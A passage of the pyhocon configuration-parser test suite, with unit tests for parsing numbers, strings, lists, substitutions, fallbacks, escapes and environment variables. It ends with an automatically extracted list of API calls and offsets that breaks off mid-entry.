short = 12 long = 12321321837612378126213217321 negative = -15 """ ) # on python 3 long will be an int but on python 2 long with be a long assert config['short'] == 12 assert isinstance(config['short'], int) assert config['long'] == 12321321837612378126213217321 assert isinstance(config['negative'], int) assert config['negative'] == -15 def test_assign_float(self): config = ConfigFactory.parse_string( """ a = 121.22 b = -121.22 c = .54 d = -.54 """ ) # on python 3 long will be an int but on python 2 long with be a long assert config['a'] == 121.22 assert config['b'] == -121.22 assert config['c'] == .54 assert config['d'] == -.54 def test_sci_real(self): """ Test scientific expression of number """ config = ConfigFactory.parse_string( """ short = 12.12321 long1 = 121.22E3423432 neg_long1 = 121.22E-1 long2 = 121.22e3423432 neg_long2 = 121.22e-3 """ ) # on python 3 long will be an int but on python 2 long with be a long assert config['short'] == 12.12321 assert config['long1'] == 121.22E3423432 assert config['neg_long1'] == 121.22E-1 assert config['long2'] == 121.22E3423432 assert config['neg_long2'] == 121.22E-3 def test_assign_strings_with_eol(self): config = ConfigFactory.parse_string( """ a = "a" b = # test # test2 "b" c = "c" """ ) assert config['a'] == 'a' assert config['b'] == 'b' assert config['c'] == 'c' def test_assign_list_numbers_with_eol(self): config = ConfigFactory.parse_string( """ a = [ 1, 2, ] b = # test # test2 [ 3, 4,] c = [ 5, 6 ] """ ) assert config['a'] == [1, 2] assert config['b'] == [3, 4] assert config['c'] == [5, 6] def test_assign_list_strings_with_eol(self): config = ConfigFactory.parse_string( """ a = [ "a", "b", ] b = # test # test2 [ "c", "d",] c = [ "e", "f" ] """ ) assert config['a'] == ['a', 'b'] assert config['b'] == ['c', 'd'] assert config['c'] == ['e', 'f'] def test_assign_dict_strings_with_equal_sign_with_eol(self): config = ConfigFactory.parse_string( """ a = { a: 1, b: 2, } b = # test # 
test2 { c: 3, d: 4,} c = { e: 5, f: 6 } """ ) assert config['a'] == {'a': 1, 'b': 2} assert config['b'] == {'c': 3, 'd': 4} assert config['c'] == {'e': 5, 'f': 6} def test_assign_dict_strings_no_equal_sign_with_eol(self): config = ConfigFactory.parse_string( """ a { a: 1, b: 2, } b # test # test2 { c: 3, d: 4,} c { e: 5, f: 6 } """ ) assert config['a'] == {'a': 1, 'b': 2} assert config['b'] == {'c': 3, 'd': 4} assert config['c'] == {'e': 5, 'f': 6} def test_substitutions_overwrite(self): config1 = ConfigFactory.parse_string( """ a = 123 a = ${?test} a = 5 """ ) assert config1['a'] == 5 config2 = ConfigFactory.parse_string( """ { database { host = "localhost" port = 8000 url = ${database.host}":"${database.port} } database { host = ${?DB_HOST} } database { host = "other.host.net" port = 433 } } """ ) assert config2['database']['host'] == 'other.host.net' assert config2['database']['port'] == 433 assert config2['database']['url'] == 'other.host.net:433' def test_fallback_substitutions_overwrite(self): config1 = ConfigFactory.parse_string( """ a = { b: 1 c: 2 } """ ) config2 = ConfigFactory.parse_string( """ a.b = 4 a.d = 3 """ ) config3 = config1.with_fallback(config2) assert config3['a'] == { 'b': 1, 'c': 2, 'd': 3 } config4 = ConfigFactory.parse_string( """ name: foo """ ) config5 = ConfigFactory.parse_string( u""" longName: "long "${?name} """, resolve=False ) config6 = config4.with_fallback(config5) assert config6 == { 'longName': 'long foo', 'name': 'foo' } def test_fallback_substitutions_overwrite_file(self): config1 = ConfigFactory.parse_string( """ { data-center-generic = { cluster-size: 8 } misc = "mist" } """ ) # use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44 config2 = config1.with_fallback(u'samples/aws.conf') assert config2 == { 'data-center-generic': {'cluster-size': 8}, 'data-center-east': {'cluster-size': 8, 'name': 'east'}, 'misc': 'mist', 'default-jvm-opts': ['-XX:+UseParNewGC'], 'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g'] } def test_fallback_self_ref_substitutions_append(self): config1 = ConfigFactory.parse_string( """ list = [ 1, 2, 3 ] """ ) config2 = ConfigFactory.parse_string( """ list = ${list} [ 4, 5, 6 ] """, resolve=False ) config2 = config2.with_fallback(config1) assert config2.get("list") == [1, 2, 3, 4, 5, 6] def test_fallback_self_ref_substitutions_append_plus_equals(self): config1 = ConfigFactory.parse_string( """ list = [ 1, 2, 3 ] """ ) config2 = ConfigFactory.parse_string( """ list += [ 4, 5, 6 ] """, resolve=False ) config2 = config2.with_fallback(config1) assert config2.get("list") == [1, 2, 3, 4, 5, 6] def test_self_merge_ref_substitutions_object(self): config1 = ConfigFactory.parse_string( """ a : { } b : 1 c : ${a} { d : [ ${b} ] } """, resolve=False ) config2 = ConfigFactory.parse_string( """ e : ${a} { } """, resolve=False ) merged = ConfigTree.merge_configs(config1, config2) ConfigParser.resolve_substitutions(merged) assert merged.get("c.d") == [1] def test_self_merge_ref_substitutions_object2(self): config1 = ConfigFactory.parse_string( """ x : { v1: 1 } b1 : {v2: 2 } b = [${b1}] """, resolve=False ) config2 = ConfigFactory.parse_string( """ b2 : ${x} {v2: 3} b += [${b2}] """, resolve=False ) merged = ConfigTree.merge_configs(config1, config2) ConfigParser.resolve_substitutions(merged) b = merged.get("b") assert len(b) == 2 assert b[0] == {'v2': 2} assert b[1] == {'v1': 1, 'v2': 3} def test_self_merge_ref_substitutions_object3(self): config1 = ConfigFactory.parse_string( """ b1 : { v1: 1 } b = [${b1}] 
""", resolve=False ) config2 = ConfigFactory.parse_string( """ b1 : { v1: 2, v2: 3 } """, resolve=False ) merged = ConfigTree.merge_configs(config1, config2) ConfigParser.resolve_substitutions(merged) assert merged.get("b1") == {"v1": 2, "v2": 3} b = merged.get("b") assert len(b) == 1 assert b[0] == {"v1": 2, "v2": 3} def test_fallback_self_ref_substitutions_merge(self): config1 = ConfigFactory.parse_string( """ dict = { x: 1 } """ ) config2 = ConfigFactory.parse_string( """ dict = ${dict} { y: 2 } """, resolve=False ) config2 = config2.with_fallback(config1) assert config2.get("dict") == {'x': 1, 'y': 2} def test_fallback_self_ref_substitutions_concat_string(self): config1 = ConfigFactory.parse_string( """ string = abc """ ) config2 = ConfigFactory.parse_string( """ string = ${string}def """, resolve=False ) result = config2.with_fallback(config1) assert result.get("string") == 'abcdef' # test no mutation on config1 assert result is not config1 # test no mutation on config2 assert "abc" not in str(config2) def test_fallback_non_root(self): root = ConfigFactory.parse_string( """ a = 1 mid.b = 1 """ ) config = root.get_config("mid").with_fallback(root) assert config['a'] == 1 and config['b'] == 1 def test_object_field_substitution(self): config = ConfigFactory.parse_string( """ A = ${Test} Test { field1 = 1 field2 = ${Test.field1}"2" field3 = ${Test.field2}"3" } """ ) assert config.get_string("A.field1") == "1" assert config.get_string("A.field2") == "12" assert config.get_string("A.field3") == "123" assert config.get_string("Test.field1") == "1" assert config.get_string("Test.field2") == "12" assert config.get_string("Test.field3") == "123" def test_one_line_quote_escape(self): config = ConfigFactory.parse_string( """ test_no_quotes: abc\\n\\n test_quotes: "abc\\n\\n" """ ) assert config == { 'test_no_quotes': 'abc\n\n', 'test_quotes': 'abc\n\n' } def test_multi_line_escape(self): config = ConfigFactory.parse_string( """ with-escaped-backslash: \"\"\" \\\\ \"\"\" with-newline-escape-sequence: \"\"\" \\n \"\"\" with-escaped-newline-escape-sequence: \"\"\" \\\\n \"\"\" """ ) assert config['with-escaped-backslash'] == '\n\\\\\n' assert config['with-newline-escape-sequence'] == '\n\\n\n' assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n' def test_multiline_with_backslash(self): config = ConfigFactory.parse_string( """ test = line1 \ line2 test2 = test """) assert config == { 'test': 'line1 line2', 'test2': 'test' } def test_from_dict_with_dict(self): d = { 'banana': 3, 'apple': 4, 'pear': 1, 'orange': 2, } config = ConfigFactory.from_dict(d) assert config == d def test_from_dict_with_ordered_dict(self): d = OrderedDict() d['banana'] = 3 d['apple'] = 4 d['pear'] = 1 d['orange'] = 2 config = ConfigFactory.from_dict(d) assert config == d def test_from_dict_with_nested_dict(self): d = OrderedDict() d['banana'] = 3 d['apple'] = 4 d['pear'] = 1 d['tree'] = { 'a': 'abc\ntest\n', 'b': [1, 2, 3] } config = ConfigFactory.from_dict(d) assert config == d def test_object_concat(self): config = ConfigFactory.parse_string( """o1 = { foo : { a : 1 b : 2 } } o2 = { foo : { b : 3 c : 4 } } o3 = ${o1} ${o2} """ ) assert config.get_int('o1.foo.b') == 2 assert config.get_int('o2.foo.b') == 3 assert config.get_int('o3.foo.b') == 3 assert config.get_int('o1.foo.c', default=42) == 42 assert config.get_int('o3.foo.a') == 1 assert config.get_int('o3.foo.c') == 4 def test_issue_75(self): config = ConfigFactory.parse_string( """base : { bar: ["a"] } sub : ${base} { baz: ${base.bar} ["b"] } sub2: ${sub} 
""" ) assert config.get_list('base.bar') == ["a"] assert config.get_list('sub.baz') == ["a", "b"] assert config.get_list('sub2.baz') == ["a", "b"] def test_plain_ordered_dict(self): config = ConfigFactory.parse_string( """ e : ${a} { } """, resolve=False ) with pytest.raises(ConfigException): config.as_plain_ordered_dict() def test_quoted_strings_with_ws(self): config = ConfigFactory.parse_string( """ no_trailing_ws = "foo" "bar " trailing_ws = "foo" "bar "{ws} trailing_ws_with_comment = "foo" "bar "{ws}// comment """.format(ws=' ')) assert config == { 'no_trailing_ws': "foo bar ", 'trailing_ws': "foo bar ", 'trailing_ws_with_comment': "foo bar " } def test_unquoted_strings_with_ws(self): config = ConfigFactory.parse_string( """ a = foo bar """) assert config == { 'a': 'foo bar' } def test_quoted_unquoted_strings_with_ws(self): config = ConfigFactory.parse_string( """ a = foo "bar" dummy """) assert config == { 'a': 'foo bar dummy' } def test_quoted_unquoted_strings_with_ws_substitutions(self): config = ConfigFactory.parse_string( """ x = 5 b = test a = foo "bar" ${b} dummy c = foo ${x} bv d = foo ${x} 43 """) assert config == { 'x': 5, 'b': 'test', 'a': 'foo bar test dummy', 'c': 'foo 5 bv', 'd': 'foo 5 43' } def test_complex_substitutions(self): config = ConfigFactory.parse_string( """ a: 1 b: ${c} { pa: [${a}] pb: ${b.pa} } c: { } d: { pc: ${b.pa} } e: ${b} """, resolve=True) assert config == { 'a': 1, 'b': {'pa': [1], 'pb': [1]}, 'c': {}, 'd': {'pc': [1]}, 'e': {'pa': [1], 'pb': [1]} } def test_assign_next_line(self): config = ConfigFactory.parse_string( """ a = // abc abc c = 5 """) assert config == { 'a': 'abc', 'c': 5 } @mock.patch.dict(os.environ, STRING_VAR='value_from_environment') def test_string_from_environment(self): config = ConfigFactory.parse_string( """ string_from_env = ${STRING_VAR} """) assert config == { 'string_from_env': 'value_from_environment' } @mock.patch.dict(os.environ, STRING_VAR='value_from_environment') def test_string_from_environment_self_ref(self): config = ConfigFactory.parse_string( """ STRING_VAR = ${STRING_VAR} """) assert config == { 'STRING_VAR': 'value_from_environment' } @mock.patch.dict(os.environ, STRING_VAR='value_from_environment') def test_string_from_environment_self_ref_optional(self): config = ConfigFactory.parse_string( """ STRING_VAR = ${?STRING_VAR} """) assert config == { 'STRING_VAR': 'value_from_environment' } @mock.patch.dict(os.environ, TRUE_OR_FALSE='false') def test_bool_from_environment(self): config = ConfigFactory.parse_string( """ bool_from_env = ${TRUE_OR_FALSE} """) assert config == { 'bool_from_env': 'false' } assert config.get_bool('bool_from_env') is False @mock.patch.dict(os.environ, INT_VAR='5') def test_int_from_environment(self): config = ConfigFactory.parse_string( """ int_from_env = ${INT_VAR} """) assert config == { 'int_from_env': '5' } assert config.get_int('int_from_env') == 5 def test_unicode_dict_key(self): input_string = u""" www.sample.com { us { name = "first domain" } } www.example-ö.com { us { name = "second domain" } } """ config = ConfigFactory.parse_string(input_string) assert config.get_string(u'www.sample.com.us.name') == 'first domain' assert config.get_string(u'www.example-ö.com.us.name') == 'second domain' with pytest.raises(ConfigWrongTypeException): config.put(u'www.example-ö', 'append_failure', append=True) with pytest.raises(ConfigMissingException): config.get_string(u'missing_unicode_key_ö') with pytest.raises(ConfigException): config.get_bool(u'www.example-ö.com.us.name') with 
pytest.raises(ConfigException): config.get_list(u'www.example-ö.com.us.name') with pytest.raises(ConfigException): config.get_config(u'www.example-ö.com.us.name') with pytest.raises(ConfigWrongTypeException): config.get_string(u'www.example-ö.com.us.name.missing') def test_with_comment_on_last_line(self): # Adress issue #102 config_tree = ConfigFactory.parse_string(""" foo: "1" bar: "2" # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""") assert config_tree == { 'foo': '1', 'bar': '2' } def test_triple_quotes_same_line(self): config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]') assert config_tree == { 'a': ['foo"', "bar"] } def test_pop(self): config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}') assert 3 == config_tree.pop('a.b', 5) assert 5 == config_tree.pop('a.c', 5) expected = { 'a': {'d': 6} } assert expected == config_tree def test_merge_overriden(self): # Adress issue #110 # ConfigValues must merge with its .overriden_value # if both are ConfigTree config_tree = ConfigFactory.parse_string(""" foo: ${bar} foo: ${baz} bar: {r: 1, s: 2} baz: {s: 3, t: 4} """) assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3 def test_attr_syntax(self): config = ConfigFactory.parse_string( """ a: 1 b: { pb: 5 } """) assert 5 == config.b.pb def test_escape_quote(self): config = ConfigFactory.parse_string( """ quoted: "abc\\"test" unquoted: abc\\"test """) assert 'abc"test' == config['quoted'] assert 'abc"test' == config['unquoted'] def test_escape_quote_complex(self): config = ConfigFactory.parse_string( """ value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}" """ ) assert '{"critical":"0.00","warning":"99.99"}' == config['value'] def test_keys_with_slash(self): config = ConfigFactory.parse_string( """ /abc/cde1: abc "/abc/cde2": "cde" /abc/cde3: "fgh" """) assert 'abc' == config['/abc/cde1'] assert 'cde' == config['/abc/cde2'] assert 'fgh' == config['/abc/cde3'] def test_mutation_values(self): config = ConfigFactory.parse_string( """ common : { } b1 = [] var = "wrong" compilerCommon : ${common} { VAR : ${var} } substrate-suite: { VAR : "right" } b1 = [ ${compilerCommon} ${substrate-suite} ${compilerCommon} ${substrate-suite} ] b2 = [ ${compilerCommon} ${substrate-suite} ${compilerCommon} ${substrate-suite} ] """) assert config.get("b1")[1]['VAR'] == 'right' assert config.get("b2")[1]['VAR'] == 'right' def test_escape_sequences_json_equivalence(self): """ Quoted strings are in the same format as JSON strings, See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json """ source = r""" { "plain-backslash": "\\", "tab": "\t", "no-tab": "\\t", "newline": "\n", "no-newline": "\\n", "cr": "\r", "no-cr": "\\r", "windows": "c:\\temp" } """ expected = { 'plain-backslash': '\\', 'tab': '\t', 'no-tab': '\\t', 'newline': '\n', 'no-newline': '\\n', 'cr': '\r', 'no-cr': '\\r', 'windows': 'c:\\temp', } config = ConfigFactory.parse_string(source) assert config == expected assert config == json.loads(source) try: from dateutil.relativedelta import relativedelta @pytest.mark.parametrize('data_set', [ ('a: 1 months', relativedelta(months=1)), ('a: 1months', relativedelta(months=1)), ('a: 2 month', relativedelta(months=2)), ('a: 3 mo', relativedelta(months=3)), ('a: 3mo', relativedelta(months=3)), ('a: 3 mon', '3 mon'), ('a: 1 years', relativedelta(years=1)), ('a: 1years', relativedelta(years=1)), ('a: 2 year', relativedelta(years=2)), ('a: 3 y', relativedelta(years=3)), ('a: 3y', relativedelta(years=3)), ]) def 
test_parse_string_with_duration_optional_units(data_set): config = ConfigFactory.parse_string(data_set[0]) assert config['a'] == data_set[1] except Exception: pass
[((2066, 2153), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2089, 2153), False, 'import pytest\n'), ((2350, 2403), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', '[\'$\', \'"\']'], {}), '(\'forbidden_char\', [\'$\', \'"\'])\n', (2373, 2403), False, 'import pytest\n'), ((2611, 2698), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2634, 2698), False, 'import pytest\n'), ((62340, 62404), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62355, 62404), False, 'import mock\n'), ((62670, 62734), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62685, 62734), False, 'import mock\n'), ((62999, 63063), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (63014, 63063), False, 'import mock\n'), ((63338, 63388), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'TRUE_OR_FALSE': '"""false"""'}), "(os.environ, TRUE_OR_FALSE='false')\n", (63353, 63388), False, 'import mock\n'), ((63691, 63731), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'INT_VAR': '"""5"""'}), "(os.environ, INT_VAR='5')\n", (63706, 63731), False, 'import mock\n'), ((696, 1177), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """'], {}), '(\n """t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """\n )\n', (722, 1177), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2997, 3146), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: 5\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: 5\n }\n }\n """\n )\n', (3023, 3146), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5001, 5040), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (5027, 5040), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5169, 5288), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: 10 weeks\n c: bar\n """'], {}), '(\n """\n a: foo\n b: 10 weeks\n c: bar\n """\n )\n', (5195, 5288), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5448, 5587), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """'], {}), '(\n """\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """\n )\n', (5474, 5587), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5750, 5789), 
'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""[1, 2, 3]"""'], {}), "('[1, 2, 3]')\n", (5776, 5789), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5884, 6113), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """'], {}), '(\n """\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """\n )\n', (5910, 6113), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6302, 6493), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """'], {}), '(\n """\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """\n )\n', (6328, 6493), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6685, 6906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """'], {}), '(\n """\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """\n )\n', (6711, 6906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((7274, 7784), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """'], {}), '(\n """\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """\n )\n', (7300, 7784), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((8473, 9026), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """'], {}), '(\n """\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """\n )\n', (8499, 9026), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9314, 9379), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n """'], {}), '("""\n a = 5\n """)\n', (9340, 9379), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9581, 9677), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = null\n b = [null]\n """'], {}), '(\n """\n a = null\n b = [null]\n """)\n', (9607, 9677), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9829, 10122), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """\n )\n', (9855, 10122), False, 'from pyhocon import ConfigFactory, ConfigParser, 
ConfigSubstitutionException, ConfigTree\n'), ((10266, 10433), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """'], {}), '(\n """\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """\n )\n', (10292, 10433), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10650, 10769), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = a b c\n b = 5 b\n c = b 7\n """'], {}), '(\n """\n a = a b c\n b = 5 b\n c = b 7\n """\n )\n', (10676, 10769), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10955, 11091), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """\n )\n', (10981, 11091), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11256, 11294), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = 45\n"""'], {}), "('a = 45\\n')\n", (11282, 11294), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11682, 11983), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """\n )\n', (11708, 11983), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12149, 12462), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """\n )\n', (12175, 12462), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12640, 12962), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """'], {}), '(\n u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """\n )\n', (12666, 12962), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13202, 13431), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """'], {}), '(\n """\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """\n )\n', (13228, 13431), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13607, 13837), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """\n )\n', (13633, 13837), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13948, 14183), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n 
c = 5\n }\n }\n d = test ${a.b.c}\n }\n """\n )\n', (13974, 14183), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14301, 14539), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """\n )\n', (14327, 14539), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14708, 14971), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """\n )\n', (14734, 14971), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15132, 15266), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """'], {}), '(\n """\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """\n )\n', (15158, 15266), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15440, 15630), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """\n )\n', (15466, 15630), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15788, 15978), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """\n )\n', (15814, 15978), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16138, 16366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" 